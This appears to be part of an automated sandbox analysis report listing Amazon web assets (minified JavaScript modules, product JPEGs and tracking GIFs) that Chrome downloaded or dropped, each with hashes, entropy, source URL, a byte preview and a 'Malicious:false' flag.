                                                                                                                                                                                                        Preview:(function(d){var f=window.AmazonUIPageJS||window.P,k=f._namespace||f.attributeErrors,a=k?k("ListsCommonUtilityAssets",""):f;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,f,k){d.when("A").register("al-ajax-response-state-parser",function(a){var b=a.$;return{getState:function(c){c=b(c).filter("#listsAjaxResponseStateSection");var e=b("#listsAjaxResponseStateSection");e&&0<=e.length&&e.remove();b(c).appendTo("body");a.state.parse();c=a.state("listsAjaxResponseState")||.{};return{hasError:c.hasError,authRequired:c.authRequired,authUrl:c.authUrl,error:c.error}}}});"use strict";d.when("A","al-bottomsheet-with-fallback","iphone-x-detector").register("bottom-sheet-utils",function(a,b,c){var e=a.$;a.declarative("al-sheet-with-fallback","click",function(e){e.$event.preventDefault();var a=e.data;e=b.create(b.buildComponentParams(a.componentName,a.showCloseButton,c.getAdjustedHeightPx(a.bottomsheetHeight),a.popoverHeight,a.popoverWidth,a.headerForPopover,a.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3934
                                                                                                                                                                                                        Entropy (8bit):7.898321111789533
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TvuZFfCBIJwCCdG7z7N5WTu3Rcu2rlCIFhYVTeKPs5ktz:+aa2CCdGv7N0mqlCY8eQs+tz
                                                                                                                                                                                                        MD5:F42321B24EAEFD5EE327914CCAC9A22B
                                                                                                                                                                                                        SHA1:965372F8B369AB86008B93702FBC470D6093C04C
                                                                                                                                                                                                        SHA-256:800D94F075F2444875B43E73090D889224359D8E6CE3D2A4841C49BB6F06330C
                                                                                                                                                                                                        SHA-512:D417C10EB6CC7CC599CE322E371A05CB91663EE09ACE2C1B36D768D89070A46C758900964C410A176EA14F841CC5C13E50B9FFA6292931664DE16F40A1BD82AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A..."Qaq...2s..3Rr.....#BC..T...c.............................................!...1A.2Q#............?..Mp|u*0....q.5.....OD...]TH ..8..5..#..;.o<~.u...U.XT.n.....C....>...wu......#^0x.iQ.CM0....... ..c......U.D.......*:..l.A..Z (.L'i#.4.&.a......9....=..4..hb.=..<..j..s.......$......F........S]*./.*.:."L. m..^].]Z...GS..3FyH..I.-..'e......:.WsG{.i.#2..M./...!)..[)Y..z.|8q......9....s..@.f.>..M.......=.;/..Cs.A.q...<x.]r...I......&.u.......2.v.KP.*....l...4....\+..0<...J$|.....D.,...#m.x.vq..|d..t.c......!..Q..h..fHJ..O..L..))E3.4@...OE*.I^.......X.x}J.-.E....NE..%.^...k.-...\.J$....#Y).....'.=.IH.4a..c6W...7._...a.No..o..YX.."F.....9...&..0.~......yB.z.rO{....V>.\..<.Q?.Uy.....Ms..v...z.C"..T..L..ElV...p3.6...>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 277x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):18451
                                                                                                                                                                                                        Entropy (8bit):7.967312107489535
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:UHi5drjrmnWz0xlHvsfmAumG7qhFRdvuuEFQKH1Yym:ysdrexVvqmhmLT2uEBYym
                                                                                                                                                                                                        MD5:78F79704C29CBE4C58120A3EF9C88902
                                                                                                                                                                                                        SHA1:CCFB4AA7E1D26D82311EBA7DAE6AC3614699C7BC
                                                                                                                                                                                                        SHA-256:8C9AAFBA72285C6367E8F874A723BD1135DE9D284468A9A103A209B6AE7679DB
                                                                                                                                                                                                        SHA-512:B1F2E8BEE5A6E48BBFE6E2F7DB3491ADE157E9EC93CB6E668638C2AEA5CD89289389C40F803DB60364CE46248F46805E330BB1122D0B599BDF514181A073D2C6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6....................................................................J.S.....Y'..s....Fs.Z...!.k/Y.D.s.. ..G.2.[,p..#..5..B.:.*@..nlWSPD..yQw=.3*o.C`A}.Q...V.I#_)........l...|.q;`..K.Qu..DN..9..a.#..aj........%.#.6^.wle..v.%...<`dKI.B.%.|.z.t,.w..+j...8...KM%J..O.o.n..'b.+Y.....l.1.Do..L...s.&....\U,Uj.....X..y.k...~R.:Ir...Jk.9...+...QzT=fh..j..I...1.J....U......W.6....Az.*.a.b|]!..^P.:....%...........N.<.=.U.6.:mX..u..d<..*..]X...`.&.j.n......ux.Z.......vUv.6..3.f...Q..zh....+.).a...].{..X.~{....h.B..XK.v.kc..9....c..@.z.5.. /{.L...+z..Z...Z...Tg.>3...?...{.b.j........U...#W..m.v.....P..+......M..l.I....Y.;.2...3./.x..h/.+.G....ZA./t.T4q.e8.....tf.h.SE.Z.?X<@4{.<c......h..r.Kn.j.Z^....]5)..Y...Tv..f,..`....5.:..y....:5...(...$.<......h.y..x.`...v$..(..0..T..4....,r..x
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3435
                                                                                                                                                                                                        Entropy (8bit):7.865406654916747
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TDpKe8sEYd+6X/+5OOBseTHlZHCwktdpnmoKIn+70sE:oelEYdK53hjOwMmQ+YX
                                                                                                                                                                                                        MD5:8DFB85BC37FB3DBC2C28D934FE6373A8
                                                                                                                                                                                                        SHA1:A114673300BB52F43B0911AEA21E2C473AF15CA0
                                                                                                                                                                                                        SHA-256:3FC37FFA2C1487E5E94BB9D21E6536605365A89E36E0DA8D79433152FDB3D163
                                                                                                                                                                                                        SHA-512:C3138C0C93C2F90368F7C26FA647A7B1818C788A6C573AD2D5E40CEE19A6A5D8AD2904CA772BE17C04CAAAFA49F0321EC9D03F511BCFCF8B18C14D0D7755C705
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A.Qq.."2Ta.......35BRSbrt.....#C.$Ds................................................!1...2AQ..Bq...."a.............?....QDE.QDE.QDE.QDE.QDE.QDE.QDE.QDE.QDY...k.......,...*wIS..*R..W[4?. ..^.Oe.4...f...~./e..f...@.....(.!s.%Ma..=./.si.....mm"R.ov..IC.vS...j...i|+.@......Z...2..........\s..&...e..V.Sm.....V.....[. $pm...O.\.,.......ilq#'.I...[..j<../>U....p_H...Q.*...Z.1..a.u.`t.4...{%...xA.*.+SW}.=..T..6..y.Z..o.*..x.'j......<1.t..[....[.j...w.Mm\.N...K=T.M.MF.m.9...`h..`6....%V:G...o..VubF..4.)...9...k.}...j.b'1U..~O...^..fZ......V..Mn..4...2..9.Q....`..v....}..j.oo.8E.2O.|j5...B....<....i..;..(.....8...b..X...q...)V..<QD|G/R...(....dTkh..u.MA.F....q.....vZ.WW,`.....l.>...5........Y........-V...[...P....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (549)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7425
                                                                                                                                                                                                        Entropy (8bit):5.2787148447911
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:zzgiblv5U7AVY6YUXSwaAlfrrTJjKkMcT8LgrX5/ERnoCEjaUMUE0jHkqjC:zzgixv5UEVSwaczlQcNrXcoNJMfl
                                                                                                                                                                                                        MD5:AE6317F339A27F5E79C515A61000C0C7
                                                                                                                                                                                                        SHA1:ACB659ED1C4EA996C6BF3B131433BA8F5B0AC31E
                                                                                                                                                                                                        SHA-256:CF152C7FCEF16508BF068E50980C60F9EE31E0FC4146D6FBB54E1A37E8332ACC
                                                                                                                                                                                                        SHA-512:9DFB95E211E2D1A184D61B6A11FCD9CF126AF03461399182F900506B532EFF70CA2218037EB291D81E9E759C2C3C3B2A1D7451E79A979D97AB190BA14D80FF24
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(h){var d=window.AmazonUIPageJS||window.P,m=d._namespace||d.attributeErrors,a=m?m("CheckoutCartPrefetchAsset",""):d;a.guardFatal?a.guardFatal(h)(a,window):a.execute(function(){h(a,window)})})(function(h,d,m){h.when("A","CartServerSetting","CartCheckoutPrefetch-DeviceAgnosticFunctions").register("CartCheckoutPrefetchDesktop",function(a,p,g){function k(){return"/gp/buy/prefetch/store-html.html"}function f(a){a="/gp/cart/checkout-prefetch.html?cartInitiateId\x3d"+a;var b=g.getBuyBoxParameters(v),.l;for(l in b)b.hasOwnProperty(l)&&(a+="\x26"+l+"\x3d"+encodeURIComponent(b[l]));return a}function b(){if(q)if(g.isTangoPreinitiateEligible())t=!1,g.javaCheckoutPreinitiate();else{t=!0;var a=(new Date).getTime(),b=f(a);g.streamJSONPrefetchRequest(b,"PreInitiate:",g.executionIdSuccessHandler,a);g.insertValueInBuyBox("cartInitiateId",a)}else a=(new Date).getTime(),b=f(a),g.streamJSONPrefetchRequest(b,"PreInitiate:",g.executionIdSuccessHandler,a),g.insertValueInBuyBox("cartInitiateId",a)}fun
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):531631
                                                                                                                                                                                                        Entropy (8bit):5.432636208001531
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:JQvrNsZU0dtWA0uc037p0c/DrViaOdSS7D7giAo++GQWlBk0BMw1RyHw1OvxfOH0:JkS+v+JlBVkHuOpfOHm05F7uM3VdjQ
                                                                                                                                                                                                        MD5:683E96A5320A5903EEE74842DA73F5C7
                                                                                                                                                                                                        SHA1:97FEAFE8A7C6ECCF9618FF7D0792CCC8E3E25195
                                                                                                                                                                                                        SHA-256:C5FC19B5C599C8521A55397A8A4EFE377F2A846448303783B6BA427CA8344ED9
                                                                                                                                                                                                        SHA-512:489FA4517134581A99A35709747827FFDE903799EFAC6D81952B5700658CD5030C689543970B340ADC0A85AD3C9DFD9283818EC82F6486C91A06151A53C8B89A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/91MiySd58vL.js
                                                                                                                                                                                                        Preview:/*! For license information please see vendor-d534662e77be2ead0b49.min.js.LICENSE.txt */.(self.discountWidgets=self.discountWidgets||[]).push([[736],{4170:function(e,t,n){"use strict";var r=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0}),t.AmazonImageComponent=void 0;const a=r(n(7294)),o=n(6726);t.AmazonImageComponent=({physId:e,height:t,width:n,weblabId:r,weblabTreatment:i,clientId:l,altText:s,className:u,isATF:c=!1,scalingType:d=null,extension:f="jpg",title:p,style:m,dataSet:g,id:h,onLoad:v,onClick:y,onError:b,ariaRole:T})=>{const _=f||"jpg",E=c?"eager":"lazy",O=u?`a-amazon-image ${u}`:"a-amazon-image",S=`https://m.media-amazon.com/images/I/${e}._AC${r&&i?`_AIweblab${r},${i}`:""}`,x=S,w=`${S}_FMwebp`,I=`${S}_FMavif`,R=l?`aicid=${l}`:"",C=R?`?${R}`:"",P={dpi15:58,dpi20:58},N={dpi15:65,dpi20:65},A={dpi10:85,dpi15:80,dpi20:80},k="CenterCropSquare"===d?{dpi10:`_UC${n},${t}_CACC,${n},${t}`,dpi15:`_UC${1.5*n},${
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10700
                                                                                                                                                                                                        Entropy (8bit):7.9571926894155265
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:LbFOKlbiBhQqoBgJ/4BSYeH1y+Er1o5WB0PnX1QbYj0QXvGzl9LG:LbTRO3d/D1y/r25WB0PXqYZfu9q
                                                                                                                                                                                                        MD5:CD580B4FD5D2EA900FD8908731055C84
                                                                                                                                                                                                        SHA1:EBF563B20BC9ACF94198EE26847274C490410262
                                                                                                                                                                                                        SHA-256:EE399A08E9C7D499D5EB716A4A9623D822EF67870962B0E978CD39F93B72083A
                                                                                                                                                                                                        SHA-512:9DA5D20F7D74B7C4294D17F835ECD76EF48DF5FBD54FD1D32202E34678FAA595D346231AEF6F928E095F61364A8084981F387E34CA611FA2C68BC3A5C22766C8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61zol3DlpeL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."A.Q#2a.BRr..34q..$56s....t...................................................1!.."AQa.2q........#..3............?..t.).JR...).U/_z.k.wB.....]... . 3a..9....z...\.?..7..W.'..}.^.PV.....G_7.ZdI.......)...P.........T.q.v....S.,7..L.`>H....].p....>.e.zu&^.o.]s....<'..E.......y.U.....Q.b.;QD.G.. 5..=A...N.V...Y.FX..e.{d.Gn..)........0Yg..pY[.l.3..'.Sf}...3.E..&........#S.u..js..x.....!..R@....u..!w.]....gvCy..+Zt.[...o).p.......WQ..U\.9.y=..J.l*.\...R..yqJR...).JR...).JR...).J....N.ud.!..e......._$.".v....y..HA.r...%..r~.H....SAj...sm\+1bA8TP.....$.+!./......w.Yb+.....,..J..+D.N......)..........{.B......... nh".l<n..peR9*..m(...o@..Mz^.F...$c..Z.L_...Q~<.3.#.D..Q6...jO.].....q<1}L.q.i..;x..3.F..V!..s........Wt..)/..y.t..\....s\'Ymc
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (700)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11064
                                                                                                                                                                                                        Entropy (8bit):5.4433174798365735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZbvlbAoUi6Dg2E5WhZzhlldp9DYBzL1XunwBwHZJwV20z9jy+5gtPRmy3zWD1o56:ZLlzUib52VlD9MBzL1XunqU70ZeAgtJ0
                                                                                                                                                                                                        MD5:B521EB86FBCCEA3698ACAF8809DB4F87
                                                                                                                                                                                                        SHA1:57C9316B7A1E2C267A9887A952E4FEFEE23FAB8F
                                                                                                                                                                                                        SHA-256:BB0037C04F550C1C068C192142C71350788550CAED8637F7A102D53DAD85ACB6
                                                                                                                                                                                                        SHA-512:19B2F06358B763FBE2EA909D8FD1BD31C9E9EC01538F1995CBB60AE5266FBF894AC951445FF8876A6F642881D3CA691595CA9F0B6A7AA0FFEF885D3E89C4E8CA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/31NQAEzynfL.js?xcp
                                                                                                                                                                                                        Preview:'use strict';mix_d("P13NSCCards__p13n-rvi:p13n-rvi__JiYG2f7T","exports tslib @p/A @c/metrics @c/aui-carousel @c/dom @c/remote-operations @c/scoped-dom @p/a-carousel-framework @c/logger @c/aui-untrusted-ajax @c/browser-operations".split(" "),function(B,u,G,y,H,I,J,K,L,M,N,O){function w(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}var n=w(G),P=w(H),Q=w(J),v=w(K),R=w(L),x=w(M),S=w(N),T=w(O),C={},z=function(a,d,b){void 0===d&&(d="");void 0===b&&(b=1);d=a+d;C.hasOwnProperty(d)||(C[d]=.!0,y.count(a,(y.count(a)||0)+b))},U=function(a){z(n["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var d=function(c,e){c={$event:{preventDefault:n["default"].$.noop,stopPropagation:n["default"].$.noop},$target:c.getContent().find('[data-a-tab-name="'+e+'"]'),data:{name:"energyEfficiencyTabSet"}};n["default"].trigger("a:declarative:a-tabs:click",c)},b=function(c,e){var h=c&&c.$event,f=c&&c.data||{},p=f.activeTabName,l=f.modalHeight,r=f
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D8934%26at%3D8934%26t%3D1723729132204%26csmtags%3DbrowserQuiteMut%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D5BRA4F30RSYWBFPSHBR1%26aftb%3D1%26lob%3D0:8934
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):676
                                                                                                                                                                                                        Entropy (8bit):5.171714767992367
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2BZ/eqKDQM3ShtD34Z9DkkM8uN6FQQJewqDEZ6R8UNIkMVFLJl:2BZ/e3DZ3ShtDoZyaiIQQJixNITVFLJl
                                                                                                                                                                                                        MD5:6E933965CAFAEC4DEFB36AB5E2AAD9A8
                                                                                                                                                                                                        SHA1:8C240969FD002A6679BA28D10DB97280B8D16158
                                                                                                                                                                                                        SHA-256:CA0541D6E2197B0686598AF9F0A2F55643E1451B1375AA2B9650169BC2E76521
                                                                                                                                                                                                        SHA-512:B49F06AE8D0F77CB63167A62C5D9C5AF78D3C4B821F73CDF2A68C28E2F90A8CC68143AE483CD8598C525B7E4F05A33B3EA5D5077F72913ADAE69ADC30CA881A7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01rGP6HIADL.js?AUIClients/GenericObservableJS
                                                                                                                                                                                                        Preview:(function(e){var d=window.AmazonUIPageJS||window.P,f=d._namespace||d.attributeErrors,a=f?f("GenericObservableJS",""):d;a.guardFatal?a.guardFatal(e)(a,window):a.execute(function(){e(a,window)})})(function(e,d,f){e.register("generic-observable",function(){return function(){var a=this,g={};a.addObserver=function(b,a){g[b]=g[b]||[];g[b].push(a)};a.removeObserver=function(b,a){b=g[b]||[];for(var c=0;c<b.length;)b[c]===a?b.splice(c,1):c++};a.notifyObservers=function(){for(var b=arguments[0],d=[],c=0;c<.arguments.length;c++)d.push(arguments[c]);b=(g[b]||[]).slice(0);for(c=0;c<b.length;c++){var f=b[c];try{f.apply(a,d)}catch(h){e.execute(function(){throw h;})}}};return a}})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (544)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2243
                                                                                                                                                                                                        Entropy (8bit):5.266863481297427
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:ZE3+F8d7jMMxU5ADpLPeaBBsPFOO0qTZk67KUTZ/UKpUBYIV:ZEOE3BVLPea0DpTZkyTZNi
                                                                                                                                                                                                        MD5:7802F6FC1955CADE889CCEB253C16029
                                                                                                                                                                                                        SHA1:F38F7FF9F7D2443F21590B3D9B4B5E8ADBF05167
                                                                                                                                                                                                        SHA-256:AA06AD40D619339C61E3B35B502111B035C03B51DEADB11A3539C9D8C4B08EF7
                                                                                                                                                                                                        SHA-512:20E6DD6C78BB5F54A87CC99F86484C5451FB6BEA51F2ADD3FFB8E580E096AD78DEB781310061881DECAEE1160EEB3BD542E42C9C3FFD1534CA6FA985C160B0FC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/11+d9I1l9AL.js?xcp
                                                                                                                                                                                                        Preview:'use strict';mix_d("AmazonHomepageCielCards__ameyal-product-shoveler:ameyal-product-shoveler__Kvjfy9i1",["exports","tslib","@p/A","@c/metrics"],function(n,p,k,q){var f=k&&"object"===typeof k&&"default"in k?k:{"default":k},r={},m=function(c,g,e){void 0===g&&(g="");void 0===e&&(e=1);g=c+g;r.hasOwnProperty(g)||(r[g]=!0,q.count(c,(q.count(c)||0)+e))},w=function(c){m(f["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var g=function(a,b){a={$event:{preventDefault:f["default"].$.noop,.stopPropagation:f["default"].$.noop},$target:a.getContent().find('[data-a-tab-name="'+b+'"]'),data:{name:"energyEfficiencyTabSet"}};f["default"].trigger("a:declarative:a-tabs:click",a)},e=function(a,b){var d=a&&a.$event,l=a&&a.data||{},u=l.activeTabName,v=l.modalHeight,t=l.name;d&&d.preventDefault&&d.preventDefault();d&&d.stopPropagation&&d.stopPropagation();d=b.get(t);d||(f["default"].on("a:popover:beforeShow:"+t,function(h){h.popover&&h.popover.getContent
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):24841
                                                                                                                                                                                                        Entropy (8bit):7.932665573143035
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:GNodyc13108b64gWmU0bV/VCym3R87F/KJSY7D6B9xfMQXD5/70M:GNodyc1l0dOmU0XgAF6x7mBzPXBl
                                                                                                                                                                                                        MD5:56C0AB3DF0885D1EF49FB252ABAAF1EB
                                                                                                                                                                                                        SHA1:58C72915493303803E53642E04524783C8DE6067
                                                                                                                                                                                                        SHA-256:FD446B8D8ED542AB5C39D7BE26BCA829D4689000829512183793CE798B754FAE
                                                                                                                                                                                                        SHA-512:69F36A68FA2F06EE604598A5B7A9E616B188B9A569DA261115C5C89D0BFE409A9ED80BB06C477DBB71D6C9A0C3AEC2BBCAE45A93163127A5D8A8023B47026112
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................5..................................................................R..........GGgWS6..\X..e.=.L.l.....{{[cg................Q1..q{x0e....g.RSRZ_FBGT..........<.XhI.().ml.......gg...t.................].%p`.........>|v..*bk@..........Z.+3...>V.;.4vp..5..K..f.+.u3.kf.J.........P..8...........8.........}.7[e......GM.b3g....T.....d..GU.+-...........y.P....H.E...O.k...{.Ob.J.n-|...........G.?.F.......nZ..H....U.........../}..M.Y'2..s...X............. ...._.+....yl...;k..c!...n.Jke..$.*..0.e46...........t1`...DC.UyI...?k....V.sY...M.o.].....e;...vHY.......-]\,.......j_..x......W..r...`...L...O..y.an............;n.ko....qS.Z[.....j..K.l.t..\.M..]..i......u...w.Y!$...........>...h....F.....hl....M[...ss....z.>........[?."........^."rv8.1..tx......%...K....u...=.......].7..9..kK.u.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):212
                                                                                                                                                                                                        Entropy (8bit):5.024547197873229
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGDtF4IzO/Bqkhab4KYK7ozXRX+1MRR1anMAuLhtI:2Q3JC/BVab4NK7ozgMzI
                                                                                                                                                                                                        MD5:A89B195ADFBD74DF01D742D52F6A7CC1
                                                                                                                                                                                                        SHA1:E317DA5F24B8E6A065C21D76CA4C1DFA1A6E7FFC
                                                                                                                                                                                                        SHA-256:9B411C1889EAE287307FC107B63A057DCC591A991E6B659444D52DC745161347
                                                                                                                                                                                                        SHA-512:EEA841E996291935051C3C8E8C98B5A549C309D4F45B619F15B339F69660F3A8673DF8C3F2352B3EE20EEC7B738617AE1343128D59D10A6E821642EFE79091E9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01qpgMOAknL.js?AUIClients/BuyBackCartAssets
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("BuyBackCartAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):768
                                                                                                                                                                                                        Entropy (8bit):5.18006490302809
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2kjZ/xqKnc5OLxypEKBAoIjGw+iKS0JBJxBfeNfiR3:2WZ/x3nijTBAozw7KhJneNfiR
                                                                                                                                                                                                        MD5:A31DABB0EF509DB9ACA5DA627458A90F
                                                                                                                                                                                                        SHA1:1CE1E27C2484DBB446D234162E700DC24D476DDF
                                                                                                                                                                                                        SHA-256:4C6029DEAEFEC0EC6726442FA6BF84EF5D28C40ABCA62DBEFE8E61FEFB09BEA8
                                                                                                                                                                                                        SHA-512:A83523A9963581977A9CEE6F75D3FF46014CB60CDADE77BD98271662F73A726EB5D96D9EA5EEB4C9C42BBD29F2DAAF1816A5EB3CCB5801F59E2575593F824238
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
